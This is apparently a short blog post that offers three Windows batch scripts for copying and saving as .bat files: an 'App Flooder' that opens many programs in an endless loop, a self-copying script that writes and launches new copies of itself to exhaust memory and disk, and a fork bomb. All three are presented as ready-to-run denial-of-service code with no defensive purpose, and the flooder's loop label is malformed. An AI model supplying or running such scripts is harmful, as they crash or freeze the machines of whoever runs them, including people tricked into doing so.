Hey Friends in this blog i will share a few interesting batch programming notes just save the text with the format of .bat
App Flooder :
@echo off
x //label
start winword //MS word
start mspaint //paint
start notepad
start write //wordpad
start cmd //cmd prompt
start explorer
start control //panel
start calc //calculator
goto x //infinite loop
Over Loading Memory :
@echo off
:A
SET /A x=%RANDOM%%%1999999999%
type damage.bat >> %x%.bat
start %x%.bat
goto:A
Fork Bomb :
:s
start %0
goto s
Comments
Post a Comment